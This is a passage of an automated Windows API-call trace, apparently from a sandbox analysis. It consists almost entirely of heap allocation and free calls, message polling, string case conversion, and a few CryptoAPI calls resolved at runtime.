wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.425] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.425] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.425] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0251.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.425] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0251.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.425] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0251.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.425] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa59a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0251.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0251.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.430] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.431] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.431] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.431] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.432] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.432] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0251.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0251.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0251.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0251.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.434] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0251.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0251.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0251.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.434] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0251.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0251.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0251.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0251.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0251.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0251.436] HeapFree (in: hHeap=0x25c0000, 